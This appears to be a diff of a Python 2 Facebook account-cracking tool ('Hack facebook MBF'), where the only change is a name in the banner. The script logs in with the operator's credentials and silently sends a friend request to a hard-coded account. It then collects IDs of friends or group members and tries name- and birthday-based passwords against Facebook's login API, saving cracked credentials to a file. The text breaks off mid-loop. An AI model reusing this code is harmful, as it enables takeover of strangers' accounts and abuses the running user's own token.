|  |
| --- |
| #!/usr/bin/python2 |
| 2 | 2 | # coding=utf-8 |
| 3 | 3 |  |
| 4 | 4 |  |
| 5 | 5 | import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize |
| 6 | 6 | from multiprocessing.pool import ThreadPool |
| 7 | 7 | from requests.exceptions import ConnectionError |
| 8 | 8 | from mechanize import Browser |
| 9 | 9 |  |
| 10 | 10 |  |
| 11 | 11 | reload(sys) |
| 12 | 12 | sys.setdefaultencoding('utf8') |
| 13 | 13 | br = mechanize.Browser() |
| 14 | 14 | br.set\_handle\_robots(False) |
| 15 | 15 | br.set\_handle\_refresh(mechanize.\_http.HTTPRefreshProcessor(),max\_time=1) |
| 16 | 16 | br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')] |
| 17 | 17 |  |
| 18 | 18 |  |
| 19 | 19 | def keluar(): |
| 20 | 20 | print "\033[1;96m[!] \x1b[1;91mExit" |
| 21 | 21 | os.sys.exit() |
| 22 | 22 |  |
| 23 | 23 |  |
| 24 | 24 | def acak(x): |
| 25 | 25 | w = 'mhkbpcP' |
| 26 | 26 | d = '' |
| 27 | 27 | for i in x: |
| 28 | 28 | d += '!'+w[random.randint(0,len(w)-1)]+i |
| 29 | 29 | return cetak(d) |
| 30 | 30 |  |
| 31 | 31 |  |
| 32 | 32 | def cetak(x): |
| 33 | 33 | w = 'mhkbpcP' |
| 34 | 34 | for i in w: |
| 35 | 35 | j = w.index(i) |
| 36 | 36 | x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j)) |
| 37 | 37 | x += '\033[0m' |
| 38 | 38 | x = x.replace('!0','\033[0m') |
| 39 | 39 | sys.stdout.write(x+'\n') |
| 40 | 40 |  |
| 41 | 41 |  |
| 42 | 42 | def jalan(z): |
| 43 | 43 | for e in z + '\n': |
| 44 | 44 | sys.stdout.write(e) |
| 45 | 45 | sys.stdout.flush() |
| 46 | 46 | time.sleep(0.05) |
| 47 | 47 |  |
| 48 | 48 |  |
| 49 |  | -  logo = """ \x1b[1;93m\_\_\_\_\_\_ \x1b[1;92m\_\_\_\_\_\_\_ \x1b[1;94m\_\_\_\_\_\_ \x1b[1;91m\_\_\_ \_\n \x1b[1;93m| | \x1b[1;92m| \_ |\x1b[1;94m| \_ | \x1b[1;91m| | | |\n \x1b[1;93m| \_ |\x1b[1;92m| |\_| |\x1b[1;94m| | || \x1b[1;91m| |\_| |\n \x1b[1;93m| | | |\x1b[1;92m| |\x1b[1;94m| |\_||\_ \x1b[1;91m| \_|\n \x1b[1;93m| |\_| |\x1b[1;92m| |\x1b[1;94m| \_\_ |\x1b[1;91m| |\_ \n \x1b[1;93m| |\x1b[1;92m| \_ |\x1b[1;94m| | | |\x1b[1;91m| \_ |\n \x1b[1;93m|\_\_\_\_\_\_| \x1b[1;92m|\_\_| |\_\_|\x1b[1;94m|\_\_\_| |\_|\x1b[1;91m|\_\_\_| |\_| \x1b[1;96mFB\n\n \x1b[1;95m●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●\n ✫╬─ \x1b[1;92mReCode \x1b[1;91m: \x1b[1;93momalip \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mFB \x1b[1;92m \x1b[1;91m: \x1b[1;96mFacebook.com/theomalip \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mGitHub \x1b[1;91m: \x1b[1;94mGithub.com/storiku \x1b[1;95m─╬✫\n ●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬● |
|  | 49 | +  logo = """ \x1b[1;93m\_\_\_\_\_\_ \x1b[1;92m\_\_\_\_\_\_\_ \x1b[1;94m\_\_\_\_\_\_ \x1b[1;91m\_\_\_ \_\n \x1b[1;93m| | \x1b[1;92m| \_ |\x1b[1;94m| \_ | \x1b[1;91m| | | |\n \x1b[1;93m| \_ |\x1b[1;92m| |\_| |\x1b[1;94m| | || \x1b[1;91m| |\_| |\n \x1b[1;93m| | | |\x1b[1;92m| |\x1b[1;94m| |\_||\_ \x1b[1;91m| \_|\n \x1b[1;93m| |\_| |\x1b[1;92m| |\x1b[1;94m| \_\_ |\x1b[1;91m| |\_ \n \x1b[1;93m| |\x1b[1;92m| \_ |\x1b[1;94m| | | |\x1b[1;91m| \_ |\n \x1b[1;93m|\_\_\_\_\_\_| \x1b[1;92m|\_\_| |\_\_|\x1b[1;94m|\_\_\_| |\_|\x1b[1;91m|\_\_\_| |\_| \x1b[1;96mFB\n\n \x1b[1;95m●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●\n ✫╬─ \x1b[1;92mReCode \x1b[1;91m: \x1b[1;93Landy22granatt \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mFB \x1b[1;92m \x1b[1;91m: \x1b[1;96mFacebook.com/theomalip \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mGitHub \x1b[1;91m: \x1b[1;94mGithub.com/storiku \x1b[1;95m─╬✫\n ●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬● |
| 50 | 50 | """ |
| 51 | 51 |  |
| 52 | 52 | def tik(): |
| 53 | 53 | titik = ['. ','.. ','... '] |
| 54 | 54 | for o in titik: |
| 55 | 55 | print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1) |
| 56 | 56 |  |
| 57 | 57 |  |
| 58 | 58 | back = 0 |
| 59 | 59 | threads = [] |
| 60 | 60 | berhasil = [] |
| 61 | 61 | cekpoint = [] |
| 62 | 62 | oks = [] |
| 63 | 63 | id = [] |
| 64 | 64 | listgrup = [] |
| 65 | 65 | vulnot = "\033[31mNot Vuln" |
| 66 | 66 | vuln = "\033[32mVuln" |
| 67 | 67 |  |
| 68 | 68 | def siapa(): |
| 69 | 69 | os.system('clear') |
| 70 | 70 | nama = raw\_input("\033[1;97mSiapa nama kamu ? \033[1;91m: \033[1;92m") |
| 71 | 71 | if nama =="": |
| 72 | 72 | print"\033[1;96m[!] \033[1;91mIsi yang benar" |
| 73 | 73 | time.sleep(1) |
| 74 | 74 | siapa() |
| 75 | 75 | else: |
| 76 | 76 | os.system('clear') |
| 77 | 77 | jalan("\033[1;97mSelamat datang \033[1;92m" +nama+ "\n\033[1;97mTerimakasih telah menggunakan tools ini !!") |
| 78 | 78 | time.sleep(1) |
| 79 | 79 | loginSC() |
| 80 | 80 |  |
| 81 | 81 |  |
| 82 | 82 | def loginSC(): |
| 83 | 83 | os.system('clear') |
| 84 | 84 | print"\033[1;97mSilahkan login SC nya dulu bosque\n" |
| 85 | 85 | username = raw\_input("\033[1;96m[\*] \033[1;97mUsername \033[1;91m: \033[1;92m") |
| 86 | 86 | password = raw\_input("\033[1;96m[\*] \033[1;97mPassword \033[1;91m: \033[1;92m") |
| 87 | 87 | if username =="dark" and password =="fb": |
| 88 | 88 | print"\033[1;96m[✓] \033[1;92mLogin success" |
| 89 | 89 | time.sleep(1) |
| 90 | 90 | login() |
| 91 | 91 | else: |
| 92 | 92 | print"\033[1;96m[!] \033[1;91mSalah!!" |
| 93 | 93 | time.sleep(1) |
| 94 | 94 | LoginSC() |
| 95 | 95 |  |
| 96 | 96 | def login(): |
| 97 | 97 | os.system('clear') |
| 98 | 98 | try: |
| 99 | 99 | toket = open('login.txt','r') |
| 100 | 100 | menu() |
| 101 | 101 | except (KeyError,IOError): |
| 102 | 102 | os.system('clear') |
| 103 | 103 | print logo |
| 104 | 104 | print 42\*"\033[1;96m=" |
| 105 | 105 | print('\033[1;96m[☆] \x1b[1;93mLOGIN AKUN FACEBOOK ANDA \x1b[1;96m[☆]' ) |
| 106 | 106 | id = raw\_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m') |
| 107 | 107 | pwd = raw\_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m') |
| 108 | 108 | tik() |
| 109 | 109 | try: |
| 110 | 110 | br.open('https://m.facebook.com') |
| 111 | 111 | except mechanize.URLError: |
| 112 | 112 | print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi" |
| 113 | 113 | keluar() |
| 114 | 114 | br.\_factory.is\_html = True |
| 115 | 115 | br.select\_form(nr=0) |
| 116 | 116 | br.form['email'] = id |
| 117 | 117 | br.form['pass'] = pwd |
| 118 | 118 | br.submit() |
| 119 | 119 | url = br.geturl() |
| 120 | 120 | if 'save-device' in url: |
| 121 | 121 | try: |
| 122 | 122 | sig= 'api\_key=882a8490361da98702bf97a021ddc14dcredentials\_type=passwordemail='+id+'format=JSONgenerate\_machine\_id=1generate\_session\_cookies=1locale=en\_USmethod=auth.loginpassword='+pwd+'return\_ssl\_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32' |
| 123 | 123 | data = {"api\_key":"882a8490361da98702bf97a021ddc14d","credentials\_type":"password","email":id,"format":"JSON", "generate\_machine\_id":"1","generate\_session\_cookies":"1","locale":"en\_US","method":"auth.login","password":pwd,"return\_ssl\_resources":"0","v":"1.0"} |
| 124 | 124 | x=hashlib.new("md5") |
| 125 | 125 | x.update(sig) |
| 126 | 126 | a=x.hexdigest() |
| 127 | 127 | data.update({'sig':a}) |
| 128 | 128 | url = "https://api.facebook.com/restserver.php" |
| 129 | 129 | r=requests.get(url,params=data) |
| 130 | 130 | z=json.loads(r.text) |
| 131 | 131 | unikers = open("login.txt", 'w') |
| 132 | 132 | unikers.write(z['access\_token']) |
| 133 | 133 | unikers.close() |
| 134 | 134 | print '\n\033[1;96m[✓] \x1b[1;92mLogin Berhasil' |
| 135 | 135 | requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access\_token='+z['access\_token']) |
| 136 | 136 | os.system('xdg-open https://www.youtube.com/omaliptv') |
| 137 | 137 | menu() |
| 138 | 138 | except requests.exceptions.ConnectionError: |
| 139 | 139 | print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi" |
| 140 | 140 | keluar() |
| 141 | 141 | if 'checkpoint' in url: |
| 142 | 142 | print("\n\033[1;96m[!] \x1b[1;91mSepertinya akun anda kena checkpoint") |
| 143 | 143 | os.system('rm -rf login.txt') |
| 144 | 144 | time.sleep(1) |
| 145 | 145 | keluar() |
| 146 | 146 | else: |
| 147 | 147 | print("\n\033[1;96m[!] \x1b[1;91mPassword/Email salah") |
| 148 | 148 | os.system('rm -rf login.txt') |
| 149 | 149 | time.sleep(1) |
| 150 | 150 | login() |
| 151 | 151 |  |
| 152 | 152 |  |
| 153 | 153 | def menu(): |
| 154 | 154 | os.system('clear') |
| 155 | 155 | try: |
| 156 | 156 | toket=open('login.txt','r').read() |
| 157 | 157 | except IOError: |
| 158 | 158 | os.system('clear') |
| 159 | 159 | print"\033[1;96m[!] \x1b[1;91mToken invalid" |
| 160 | 160 | os.system('rm -rf login.txt') |
| 161 | 161 | time.sleep(1) |
| 162 | 162 | keluar() |
| 163 | 163 | try: |
| 164 | 164 | otw = requests.get('https://graph.facebook.com/me?access\_token='+toket) |
| 165 | 165 | a = json.loads(otw.text) |
| 166 | 166 | nama = a['name'] |
| 167 | 167 | id = a['id'] |
| 168 | 168 | except KeyError: |
| 169 | 169 | os.system('clear') |
| 170 | 170 | print"\033[1;96m[!] \033[1;91mToken invalid" |
| 171 | 171 | os.system('rm -rf login.txt') |
| 172 | 172 | time.sleep(1) |
| 173 | 173 | login() |
| 174 | 174 | except requests.exceptions.ConnectionError: |
| 175 | 175 | print"\033[1;96m[!] \x1b[1;91mTidak ada koneksi" |
| 176 | 176 | keluar() |
| 177 | 177 | os.system("clear") |
| 178 | 178 | print logo |
| 179 | 179 | print 42\*"\033[1;96m=" |
| 180 | 180 | print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Nama \033[1;91m: \033[1;92m"+nama+"\033[1;97m " |
| 181 | 181 | print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m " |
| 182 | 182 | print 42\*"\033[1;96m=" |
| 183 | 183 | print "\x1b[1;97m1.\x1b[1;93m Hack facebook MBF" |
| 184 | 184 | print "\x1b[1;97m2.\x1b[1;93m Lihat daftar grup " |
| 185 | 185 | print "\x1b[1;97m3.\x1b[1;93m Informasi akun " |
| 186 | 186 | print "\x1b[1;97m4.\x1b[1;93m Yahoo clone " |
| 187 | 187 | print "\n\x1b[1;91m0.\x1b[1;91m Logout " |
| 188 | 188 | pilih() |
| 189 | 189 |  |
| 190 | 190 |  |
| 191 | 191 | def pilih(): |
| 192 | 192 | unikers = raw\_input("\n\033[1;97m >>> \033[1;97m") |
| 193 | 193 | if unikers =="": |
| 194 | 194 | print "\033[1;96m[!] \x1b[1;91mIsi yang benar" |
| 195 | 195 | pilih() |
| 196 | 196 | elif unikers =="1": |
| 197 | 197 | super() |
| 198 | 198 | elif unikers =="2": |
| 199 | 199 | grupsaya() |
| 200 | 200 | elif unikers =="3": |
| 201 | 201 | informasi() |
| 202 | 202 | elif unikers =="4": |
| 203 | 203 | yahoo() |
| 204 | 204 | elif unikers =="0": |
| 205 | 205 | os.system('clear') |
| 206 | 206 | jalan('Menghapus token') |
| 207 | 207 | os.system('rm -rf login.txt') |
| 208 | 208 | keluar() |
| 209 | 209 | else: |
| 210 | 210 | print "\033[1;96m[!] \x1b[1;91mIsi yang benar" |
| 211 | 211 | pilih() |
| 212 | 212 |  |
| 213 | 213 |  |
| 214 | 214 | def super(): |
| 215 | 215 | global toket |
| 216 | 216 | os.system('clear') |
| 217 | 217 | try: |
| 218 | 218 | toket=open('login.txt','r').read() |
| 219 | 219 | except IOError: |
| 220 | 220 | print"\033[1;96m[!] \x1b[1;91mToken invalid" |
| 221 | 221 | os.system('rm -rf login.txt') |
| 222 | 222 | time.sleep(1) |
| 223 | 223 | keluar() |
| 224 | 224 | os.system('clear') |
| 225 | 225 | print logo |
| 226 | 226 | print 42\*"\033[1;96m=" |
| 227 | 227 | print "\x1b[1;97m1.\x1b[1;93m Crack dari daftar teman" |
| 228 | 228 | print "\x1b[1;97m2.\x1b[1;93m Crack dari teman" |
| 229 | 229 | print "\x1b[1;97m3.\x1b[1;93m Crack dari member grup" |
| 230 | 230 | print "\x1b[1;97m4.\x1b[1;93m Crack dari file" |
| 231 | 231 | print "\n\x1b[1;91m0.\x1b[1;91m Kembali" |
| 232 | 232 | pilih\_super() |
| 233 | 233 |  |
| 234 | 234 | def pilih\_super(): |
| 235 | 235 | peak = raw\_input("\n\033[1;97m >>> \033[1;97m") |
| 236 | 236 | if peak =="": |
| 237 | 237 | print "\033[1;96m[!] \x1b[1;91mIsi yang benar" |
| 238 | 238 | pilih\_super() |
| 239 | 239 | elif peak =="1": |
| 240 | 240 | os.system('clear') |
| 241 | 241 | print logo |
| 242 | 242 | print 42\*"\033[1;96m=" |
| 243 | 243 | jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...') |
| 244 | 244 | r = requests.get("https://graph.facebook.com/me/friends?access\_token="+toket) |
| 245 | 245 | z = json.loads(r.text) |
| 246 | 246 | for s in z['data']: |
| 247 | 247 | id.append(s['id']) |
| 248 | 248 | elif peak =="2": |
| 249 | 249 | os.system('clear') |
| 250 | 250 | print logo |
| 251 | 251 | print 42\*"\033[1;96m=" |
| 252 | 252 | idt = raw\_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m") |
| 253 | 253 | try: |
| 254 | 254 | jok = requests.get("https://graph.facebook.com/"+idt+"?access\_token="+toket) |
| 255 | 255 | op = json.loads(jok.text) |
| 256 | 256 | print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama teman\033[1;91m :\033[1;97m "+op["name"] |
| 257 | 257 | except KeyError: |
| 258 | 258 | print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!" |
| 259 | 259 | raw\_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") |
| 260 | 260 | super() |
| 261 | 261 | jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...') |
| 262 | 262 | r = requests.get("https://graph.facebook.com/"+idt+"/friends?access\_token="+toket) |
| 263 | 263 | z = json.loads(r.text) |
| 264 | 264 | for i in z['data']: |
| 265 | 265 | id.append(i['id']) |
| 266 | 266 | elif peak =="3": |
| 267 | 267 | os.system('clear') |
| 268 | 268 | print logo |
| 269 | 269 | print 42\*"\033[1;96m=" |
| 270 | 270 | idg=raw\_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ') |
| 271 | 271 | try: |
| 272 | 272 | r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access\_token='+toket) |
| 273 | 273 | asw=json.loads(r.text) |
| 274 | 274 | print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name'] |
| 275 | 275 | except KeyError: |
| 276 | 276 | print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan" |
| 277 | 277 | raw\_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]") |
| 278 | 278 | super() |
| 279 | 279 | jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...') |
| 280 | 280 | re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access\_token='+toket) |
| 281 | 281 | s=json.loads(re.text) |
| 282 | 282 | for p in s['data']: |
| 283 | 283 | id.append(p['id']) |
| 284 | 284 | elif peak =="4": |
| 285 | 285 | os.system('clear') |
| 286 | 286 | print logo |
| 287 | 287 | print 42\*"\033[1;96m=" |
| 288 | 288 | try: |
| 289 | 289 | idlist = raw\_input('\x1b[1;96m[+] \x1b[1;93mMasukan nama file \x1b[1;91m: \x1b[1;97m') |
| 290 | 290 | for line in open(idlist,'r').readlines(): |
| 291 | 291 | id.append(line.strip()) |
| 292 | 292 | except IOError: |
| 293 | 293 | print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan' |
| 294 | 294 | raw\_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]') |
| 295 | 295 | super() |
| 296 | 296 | elif peak =="0": |
| 297 | 297 | menu() |
| 298 | 298 | else: |
| 299 | 299 | print "\033[1;96m[!] \x1b[1;91mIsi yang benar" |
| 300 | 300 | pilih\_super() |
| 301 | 301 |  |
| 302 | 302 | print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m"+str(len(id)) |
| 303 | 303 | titik = ['. ','.. ','... '] |
| 304 | 304 | for o in titik: |
| 305 | 305 | print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1) |
| 306 | 306 | print |
| 307 | 307 | print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z') |
| 308 | 308 | print 42\*"\033[1;96m=" |
| 309 | 309 |  |
| 310 | 310 |  |
| 311 | 311 | def main(arg): |
| 312 | 312 | global cekpoint,oks |
| 313 | 313 | user = arg |
| 314 | 314 | try: |
| 315 | 315 | os.mkdir('out') |
| 316 | 316 | except OSError: |
| 317 | 317 | pass |
| 318 | 318 | try: |
| 319 | 319 | a = requests.get('https://graph.facebook.com/'+user+'/?access\_token='+toket) |
| 320 | 320 | b = json.loads(a.text) |
| 321 | 321 | pass1 = b['first\_name']+'123' |
| 322 | 322 | data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email="+(user)+"&locale=en\_US&password="+(pass1)+"&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") |
| 323 | 323 | q = json.load(data) |
| 324 | 324 | if 'access\_token' in q: |
| 325 | 325 | print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL' |
| 326 | 326 | print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name'] |
| 327 | 327 | print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user |
| 328 | 328 | print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass1 + '\n' |
| 329 | 329 | oks.append(user+pass1) |
| 330 | 330 | else: |
| 331 | 331 | if 'www.facebook.com' in q["error\_msg"]: |
| 332 | 332 | print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT' |
| 333 | 333 | print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name'] |
| 334 | 334 | print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user |
| 335 | 335 | print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass1 + '\n' |
| 336 | 336 | cek = open("out/super\_cp.txt", "a") |
| 337 | 337 | cek.write("ID:" +user+ " Pw:" +pass1+"\n") |
| 338 | 338 | cek.close() |
| 339 | 339 | cekpoint.append(user+pass1) |
| 340 | 340 | else: |
| 341 | 341 | pass2 = b['first\_name']+'12345' |
| 342 | 342 | data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email="+(user)+"&locale=en\_US&password="+(pass2)+"&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") |
| 343 | 343 | q = json.load(data) |
| 344 | 344 | if 'access\_token' in q: |
| 345 | 345 | print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL' |
| 346 | 346 | print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name'] |
| 347 | 347 | print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user |
| 348 | 348 | print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass2 + '\n' |
| 349 | 349 | oks.append(user+pass2) |
| 350 | 350 | else: |
| 351 | 351 | if 'www.facebook.com' in q["error\_msg"]: |
| 352 | 352 | print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT' |
| 353 | 353 | print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name'] |
| 354 | 354 | print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user |
| 355 | 355 | print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass2 + '\n' |
| 356 | 356 | cek = open("out/super\_cp.txt", "a") |
| 357 | 357 | cek.write("ID:" +user+ " Pw:" +pass2+"\n") |
| 358 | 358 | cek.close() |
| 359 | 359 | cekpoint.append(user+pass2) |
| 360 | 360 | else: |
| 361 | 361 | pass3 = b['last\_name'] + '123' |
| 362 | 362 | data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email="+(user)+"&locale=en\_US&password="+(pass3)+"&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") |
| 363 | 363 | q = json.load(data) |
| 364 | 364 | if 'access\_token' in q: |
| 365 | 365 | print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL' |
| 366 | 366 | print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name'] |
| 367 | 367 | print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user |
| 368 | 368 | print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass3 + '\n' |
| 369 | 369 | oks.append(user+pass3) |
| 370 | 370 | else: |
| 371 | 371 | if 'www.facebook.com' in q["error\_msg"]: |
| 372 | 372 | print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT' |
| 373 | 373 | print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name'] |
| 374 | 374 | print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user |
| 375 | 375 | print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass3 + '\n' |
| 376 | 376 | cek = open("out/super\_cp.txt", "a") |
| 377 | 377 | cek.write("ID:" +user+ " Pw:" +pass3+"\n") |
| 378 | 378 | cek.close() |
| 379 | 379 | cekpoint.append(user+pass3) |
| 380 | 380 | else: |
| 381 | 381 | pass4 = 'Bangsat' |
| 382 | 382 | data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email="+(user)+"&locale=en\_US&password="+(pass4)+"&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") |
| 383 | 383 | q = json.load(data) |
| 384 | 384 | if 'access\_token' in q: |
| 385 | 385 | print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL' |
| 386 | 386 | print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name'] |
| 387 | 387 | print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user |
| 388 | 388 | print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass4 + '\n' |
| 389 | 389 | oks.append(user+pass4) |
| 390 | 390 | else: |
| 391 | 391 | if 'www.facebook.com' in q["error\_msg"]: |
| 392 | 392 | print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT' |
| 393 | 393 | print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name'] |
| 394 | 394 | print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user |
| 395 | 395 | print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass4 + '\n' |
| 396 | 396 | cek = open("out/super\_cp.txt", "a") |
| 397 | 397 | cek.write("ID:" +user+ " Pw:" +pass4+"\n") |
| 398 | 398 | cek.close() |
| 399 | 399 | cekpoint.append(user+pass4) |
| 400 | 400 | else: |
| 401 | 401 | birthday = b['birthday'] |
| 402 | 402 | pass5 = birthday.replace('/', '') |
| 403 | 403 | data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email="+(user)+"&locale=en\_US&password="+(pass5)+"&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") |
| 404 | 404 | q = json.load(data) |
| 405 | 405 | if 'access\_token' in q: |
| 406 | 406 | print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL' |
| 407 | 407 | print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name'] |
| 408 | 408 | print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user |
| 409 | 409 | print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass5 + '\n' |
| 410 | 410 | oks.append(user+pass5) |
| 411 | 411 | else: |
| 412 | 412 | if 'www.facebook.com' in q["error\_msg"]: |
| 413 | 413 | print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT' |
| 414 | 414 | print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name'] |
| 415 | 415 | print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user |
| 416 | 416 | print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass5 + '\n' |
| 417 | 417 | cek = open("out/super\_cp.txt", "a") |
| 418 | 418 | cek.write("ID:" +user+ " Pw:" +pass5+"\n") |
| 419 | 419 | cek.close() |
| 420 | 420 | cekpoint.append(user+pass5) |
| 421 | 421 | else: |
| 422 | 422 | pass6 = 'Sayang' |
| 423 | 423 | data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email="+(user)+"&locale=en\_US&password="+(pass6)+"&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6") |
| 424 | 424 | q = json.load(data) |
| 425 | 425 | if 'access\_token' in q: |
| 426 | 426 | print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL' |
| 427 | 427 | print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name'] |
| 428 | 428 | print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user |
| 429 | 429 | print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass6 + '\n' |
| 430 | 430 | oks.append(user+pass6) |
| 431 | 431 | else: |
| 432 | 432 | if 'www.facebook.com' in q["error\_msg"]: |
| 433 | 433 | print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT' |
